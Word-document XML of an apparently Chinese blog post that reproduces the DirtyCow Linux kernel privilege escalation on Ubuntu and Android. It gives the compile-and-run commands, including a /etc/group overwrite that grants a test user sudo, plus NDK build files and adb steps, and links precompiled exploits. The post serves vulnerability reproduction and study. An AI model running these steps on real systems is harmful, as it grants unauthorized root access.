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E7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150" w:line="525" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="696969"/>
          <w:kern w:val="36"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="696969"/>
          <w:kern w:val="36"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>DirtyCow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="696969"/>
          <w:kern w:val="36"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>（脏牛）漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823A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823AE7">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="999999"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>2018-05-27</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>阅读量: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该文章首发于：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 xml:space="preserve"> 90sec(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九零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 xml:space="preserve">) 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文章链接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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00823AE7">
          <w:rPr>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0088CC"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://forum.90sec.com/t/topic/521</w:t>
        </w:r>
      </w:hyperlink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这几天发现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90sec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需要登录才能浏览文章，为了方便就把该文章也发在个人博客，并顺便</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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把之前</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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编译好的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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脏牛提权</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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也一块放出来。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编译好的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下载地址：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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00823AE7">
          <w:rPr>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:color w:val="0088CC"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/Brucetg/DirtyCow-EXP</w:t>
        </w:r>
      </w:hyperlink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该漏洞是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Linux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内核的内存子系统在处理写时拷贝（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Copy-on-Write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）时存在条件竞争漏洞，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导致可以破坏私有只读内存映射。黑客可以在获取低权限的</w:t>
      </w:r>
      <w:proofErr w:type="gram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的</w:t>
      </w:r>
      <w:proofErr w:type="gram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本地用户后，利用此漏洞获取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其他只读内存映射的写权限，进一步获取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root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权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="292"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="574C4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="574C4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve">Ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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14.04 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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1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）添加用户：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adduser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test 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输入两次密码后一直回车就行，查看当前用户的信息，终端输入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id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，回车，可以看到当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前用户是有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sudo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权限的。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lastRenderedPageBreak/>
        <w:t>切换到刚刚新建的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test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用户，同样输入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id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，查看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test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用户的信息，发现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test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用户没有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sudo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权限，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6839585" cy="1353185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="图片 27" descr="https://s1.ax1x.com/2018/05/27/ChB3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ax1x.com/2018/05/27/ChB3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2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）运行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DirtyCow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进行提权：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clone https://github.com/dirtycow/dirtycow.github.io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cd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dirtycow.github.io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编译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gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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dirtyc0w.c -o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dirtycow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lpthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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执行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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dirtycow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/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etc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/group “$(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sed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‘/\(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sudo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*\)/ s/$/,test/’ /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etc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/group)”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6818630" cy="1416685"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="https://s1.ax1x.com/2018/05/27/ChBG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ax1x.com/2018/05/27/ChBGT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3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lastRenderedPageBreak/>
        <w:t>新打开一个终端，切换到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，查看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用户信息，可以看到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用户已经拥有了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sudo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权限，执行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sudo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su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，输入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用户的密码后就可以切换到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root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权限，</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权成功</w:t>
      </w:r>
      <w:proofErr w:type="gram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。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7526655" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25" name="图片 25" descr="https://s1.ax1x.com/2018/05/27/ChB6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ax1x.com/2018/05/27/ChB6k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漏洞成因：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Linux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写时拷贝技术（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copy-on-write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）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Linux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系统中，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fork()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会产生一个和</w:t>
      </w:r>
      <w:proofErr w:type="gram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父进程</w:t>
      </w:r>
      <w:proofErr w:type="gram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完全相同的子进程，但子进程在此后多会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exec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系统调用，出于效率考虑，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Linux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系统中引入了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“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写时复制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”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技术，也就是只有进程空间的各段的内容要发生变化时，才会将父进程的内容复制一份给子进程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="292"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="574C4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="574C4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2.Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="574C4C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>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Linux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上编译好的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平台上不能用，使用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NDK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编译下载好的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下载地址：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https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="420"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/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lastRenderedPageBreak/>
        <w:t>1. ANDROID STUDIO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中安装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NDK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，把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CMAKE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和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LLDB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也安装一下：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9646285" cy="5438775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="24" name="图片 24" descr="https://s1.ax1x.com/2018/05/27/ChBH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ax1x.com/2018/05/27/ChBHt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2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pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="420"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/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 xml:space="preserve">2. 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在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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00823AE7">
          <w:rPr>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="0088CC"/>
            <w:spacing w:val="34"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>HTTPS://GITHUB.COM/GOOGLESAMPLES/ANDROID-NDK</w:t>
        </w:r>
      </w:hyperlink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 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下载源码，导入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ANDROID STUDIO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lastRenderedPageBreak/>
        <w:t>如果导入项目时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 studio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好像卡住了一样，有可能是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 Studio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在后台正在下载东西，沿着这个路径：项目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/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gradle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/wrapper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找到这个文件：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gradle-wrapper.properties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，打开它看看最后一行的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gradle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版本，若版本和你现有的版本不一致，可以去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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://services.gradle.org/distributions/" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="0088CC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://services.gradle.org/distributions/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fldChar w:fldCharType="end"/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 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上下载相应的版本，手动拷贝到：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C:\Users\</w:t>
      </w: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用户名</w:t>
      </w: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\.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gradle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\wrapper\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dists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\gradle-4.1-all\bzyivzo6n839fup2jbap0tjew   </w:t>
      </w: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目录下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注：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这里的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bzyivzo6n839fup2jbap0tjew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是随机的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将下载好的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android-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ndk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源码解压到某个位置，这里我是解压到了桌面上，所以在我个人的</w:t>
      </w:r>
      <w:proofErr w:type="gram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的</w:t>
      </w:r>
      <w:proofErr w:type="gram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计算机上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android-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ndk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路径如下：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C:\Users\wangzt\Desktop\android-ndk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我们只需要用下面路径中的相应文件即可：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C:\Users\wangzt\Desktop\android-ndk\hello-jni\app\src\main\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main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目录下新建文件夹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jni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，在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jni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文件夹中新建两个文件：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Android.mk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Application.mk,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内容如下：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Android.mk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LOCAL_PATH:= $(call my-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)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include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$(CLEAR_VARS)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LOCAL_SRC_FILES:= dirtyc0w.c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lastRenderedPageBreak/>
        <w:t xml:space="preserve">LOCAL_MODULE:=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dirtycow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LOCAL_FORCE_STATIC_</w:t>
      </w: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EXECUTABLE :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= true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#LOCAL_STATIC_</w:t>
      </w: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LIBRARIES :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=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libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#LOCAL_CFLAGS += -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Iinclude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/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-DSOMEFLAGS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include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$(BUILD_EXECUTABLE)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Application.mk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APP_</w:t>
      </w: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ABI :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= all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要编译的文件：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6247765" cy="1532890"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="https://s1.ax1x.com/2018/05/27/ChDF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ax1x.com/2018/05/27/ChDF9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pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="420"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/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 xml:space="preserve">3. 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编译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b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="34"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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命令行下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cd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到如下目录：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C:\Users\wangzt\Desktop\android-ndk\hello-jni\app\src\main\jni&gt;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执行命令：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D:\AndroidSDK\ndk-bundle\ndk-build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编译成功后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,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main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目录下的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libs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文件夹中即可找到编译好的对应平台的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12585065" cy="4783455"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="https://s1.ax1x.com/2018/05/27/ChDm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ax1x.com/2018/05/27/ChDmH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06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编译好的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6057265" cy="2278380"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="21" name="图片 21" descr="https://s1.ax1x.com/2018/05/27/ChDM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ax1x.com/2018/05/27/ChDM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lastRenderedPageBreak/>
        <w:t>Android 4.4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adb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连接手机（</w:t>
      </w:r>
      <w:proofErr w:type="gram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手机需</w:t>
      </w:r>
      <w:proofErr w:type="gram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开启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USB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调试）：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查看和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adb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连接的设备：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2600325" cy="534035"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="https://s1.ax1x.com/2018/05/27/ChDr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ax1x.com/2018/05/27/ChDrv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/system/bin/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目录下新建文件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test_dirty_cow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，并且将其权限修改为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644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8905875" cy="4059555"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="https://s1.ax1x.com/2018/05/27/ChDc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ax1x.com/2018/05/27/ChDcb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lastRenderedPageBreak/>
        <w:t>将编译好的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 push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到测试机的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/data/local/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tmp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/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目录下的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dirtycow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文件中（这里选用的编译好的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POC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是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armeabi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平台的，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arm64-v8a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经测试不能使用，可以根据自己用的测试机的架构选择相应的平台）：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8202930" cy="544195"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255"/>
            <wp:docPr id="18" name="图片 18" descr="https://s1.ax1x.com/2018/05/27/ChD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.ax1x.com/2018/05/27/ChDRU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93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修改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9202420" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="17" name="图片 17" descr="https://s1.ax1x.com/2018/05/27/ChD4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.ax1x.com/2018/05/27/ChD48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242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当前用户权限（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shell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）：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9561830" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="https://s1.ax1x.com/2018/05/27/ChDT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.ax1x.com/2018/05/27/ChDTK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83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切换到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root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权限，向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test_dirty_cow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文件中写入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123456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，写入之后再切换为普通用户权限（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shell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），以普通用户权限执行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（下同）：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/data/local/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tmp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/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dirtycow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/system/bin/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test_dirty_cow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modify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lastRenderedPageBreak/>
        <w:t>然后查看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test_dirty_cow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中的内容，发现文件内容已被修改为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modify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，复现成功：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9175750" cy="4894580"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="15" name="图片 15" descr="https://s1.ax1x.com/2018/05/27/ChD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.ax1x.com/2018/05/27/ChDLa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 xml:space="preserve">Android 6.0.1 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（安全补丁程序级别：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 xml:space="preserve"> 2017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年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2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月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1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日）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测试机系统具体信息：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5761355" cy="13277215"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="14" name="图片 14" descr="https://s1.ax1x.com/2018/05/27/ChDz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.ax1x.com/2018/05/27/ChDzx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32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6020435" cy="12812395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="13" name="图片 13" descr="https://s1.ax1x.com/2018/05/27/Chrp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.ax1x.com/2018/05/27/ChrpM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128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Android 6.0.1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默认关闭了并隐藏了开发者选项，需要在关于手机里的版本号处连续点击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5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次版本号才可以启用开发者选项，然后在开发者选项中启用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USB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调试。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9159875" cy="1580515"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635"/>
            <wp:docPr id="12" name="图片 12" descr="https://s1.ax1x.com/2018/05/27/Chri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.ax1x.com/2018/05/27/ChriZ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87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接着我们在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/system/bin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目录下创建一个普通用户没有写权限的文件，因为默认的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/system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目录是只读的，所以需要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remount /system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注意：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mount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-o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rw,remount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/system   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上述命令中，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remount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和它前面的逗号之间不要有空格。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接下来的操作步骤和在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Android 4.4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系统中差不多：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9133205" cy="4133215"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="11" name="图片 11" descr="https://s1.ax1x.com/2018/05/27/ChrZ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.ax1x.com/2018/05/27/ChrZRK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20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adb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中切换为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root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权限，将新建的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test_dirtycow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文件的权限修改为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644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6897370" cy="1553845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="10" name="图片 10" descr="https://s1.ax1x.com/2018/05/27/Chrn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.ax1x.com/2018/05/27/ChrnM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37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给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可执行权限：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bookmarkStart w:id="0" w:name="_GoBack"/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5715911" cy="2426816"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="https://s1.ax1x.com/2018/05/27/ChrK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.ax1x.com/2018/05/27/ChrKq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69" cy="243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执行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EXP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报错：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5866765" cy="306705"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="https://s1.ax1x.com/2018/05/27/ChrQ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.ax1x.com/2018/05/27/ChrQZ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PIE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这个安全机制从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4.1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引入，但是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 L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之前的系统版本并不会去检验可执行文件是否基于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PIE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编译出的。因此不会报错。但是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 L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已经开启验证，如果调用的可执行文件不是基于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PIE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方式编译的，则无法运行。解决办法非常简单，在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Android.mk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中加入如下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flag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即可。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LOCAL_CFLAGS += -pie -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fPIE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LOCAL_LDFLAGS += -pie -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fPIE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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修改后的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 xml:space="preserve">Android.mk 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文件：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LOCAL_PATH:= $(call my-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)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include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$(CLEAR_VARS)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LOCAL_SRC_FILES:= dirtyc0w.c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lastRenderedPageBreak/>
        <w:t xml:space="preserve">LOCAL_MODULE:=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dirtycow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LOCAL_FORCE_STATIC_</w:t>
      </w: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EXECUTABLE :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= true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#LOCAL_STATIC_</w:t>
      </w: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LIBRARIES :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=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libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#LOCAL_CFLAGS += -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Iinclude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/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-DSOMEFLAGS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LOCAL_CFLAGS += -pie -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fPIE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LOCAL_LDFLAGS += -pie -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fPIE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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include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$(BUILD_EXECUTABLE)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Application.mk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APP_</w:t>
      </w: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ABI :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= all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编译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Windows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命令行下进行编译，因为我下载的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ndk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存放在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D:\AndroidSDK\ndk-bundle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文件夹中，所以只需要在命令行下输入如下命令进行编译：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D:\AndroidSDK\ndk-bundle\ndk-build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5412402" cy="2700588"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="7" name="图片 7" descr="https://s1.ax1x.com/2018/05/27/ChrY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.ax1x.com/2018/05/27/ChrYz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06" cy="270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经测试，不能任意修改文件内容：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5227408" cy="2503826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="https://s1.ax1x.com/2018/05/27/ChrN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.ax1x.com/2018/05/27/ChrNQ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465" cy="25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因为这个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 6.0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的系统安全补丁是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2017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年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2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月份的，估计漏洞已经修补好了。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Android 6.0.1_r68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（安全补丁程序级别：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 xml:space="preserve"> 2016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年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9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月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6</w:t>
      </w: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日）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不多说，一样的操作：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5670761" cy="3990265"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="https://s1.ax1x.com/2018/05/27/Chrw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.ax1x.com/2018/05/27/ChrwZj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36" cy="39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可以看到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test_dirtyc0w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文件中的内容被修改为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modify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，复现成功。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b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Android 5.1.1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复现过程：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用的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是测试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Android 6.0.1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时编译好的，拿来直接用即可。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5833202" cy="2387157"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="https://s1.ax1x.com/2018/05/27/Chrs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.ax1x.com/2018/05/27/ChrsJ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11" cy="238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在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/system/bin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目录下新建文件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，试了几次没有成功：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5638548" cy="995615"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="https://s1.ax1x.com/2018/05/27/Chr4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.ax1x.com/2018/05/27/Chr4oR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77" cy="9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解决办法：执行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proofErr w:type="gram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mount</w:t>
      </w:r>
      <w:proofErr w:type="gram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-o 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rw,remount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/system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并将新建的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权限修改为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644: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5454687" cy="910060"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2" name="图片 2" descr="https://s1.ax1x.com/2018/05/27/Chro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.ax1x.com/2018/05/27/ChroJx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90" cy="91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proofErr w:type="gram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向文件</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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中写入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123456,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执行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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="6" w:space="11" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="6" w:space="11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</w:pPr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/data/local/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tmp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/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dirtycow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/system/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>test_dirty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823AE7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> modify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lastRenderedPageBreak/>
        <w:t>EXP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执行一段时间后即可停止，此时再次查看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proofErr w:type="spellStart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test_dirty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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文件中的内容，发现文件内容已被更改为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 xml:space="preserve"> modify</w:t>
      </w:r>
      <w:r w:rsidRPr="00823AE7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，复现成功：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00823AE7" w:rsidRPr="00823AE7" w:rsidRDefault="00823AE7" w:rsidP="00823AE7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="420" w:line="432" w:lineRule="atLeast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1A1A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6184093" cy="1726393"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1" name="图片 1" descr="https://s1.ax1x.com/2018/05/27/Chrq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.ax1x.com/2018/05/27/Chrqy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93" cy="172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CB" w:rsidRDefault="006D16CB"/>
    <w:sectPr w:rsidR="006D1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7"/>
    <w:rsid w:val="006D16CB"/>
    <w:rsid w:val="00823AE7"/>
    <w:rsid w:val="00C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7B9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7B9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27B9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23A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2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27B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727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AE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23AE7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="archive-article-date">
    <w:name w:val="archive-article-date"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00823AE7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00823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3A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23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3A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3AE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23A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23A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7B9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7B9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27B9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23A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2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27B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727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AE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23AE7"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="archive-article-date">
    <w:name w:val="archive-article-date"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00823AE7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00823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3A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23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3A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3AE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23A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23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github.com/Brucetg/DirtyCow-EXP" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/googlesamples/android-ndk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forum.90sec.com/t/topic/52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hyperlink" Target="https://brucetg.github.io/2018/05/27/DirtyCow%EF%BC%88%E8%84%8F%E7%89%9B%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B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2022-11-10T02:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-10T02:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>